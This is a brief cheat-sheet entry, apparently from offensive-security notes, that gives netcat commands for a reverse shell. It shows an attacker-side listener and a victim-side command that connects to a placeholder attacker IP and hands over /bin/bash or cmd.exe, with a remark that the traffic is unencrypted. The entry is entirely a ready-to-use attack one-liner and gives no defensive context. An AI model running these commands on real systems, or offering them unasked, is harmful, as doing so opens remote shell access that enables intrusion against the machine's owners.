Shell
Bash
Reverse shell with netcat
Bash
# Netcat attacker
nc -nvlp <port> -e {/bin/bash | cmd.exe}
# Netcat victim
nc -nv <attacker-ip> <port> -e {/bin/bash | cmd.exe}
⚠️ Shell exchanges are in plain text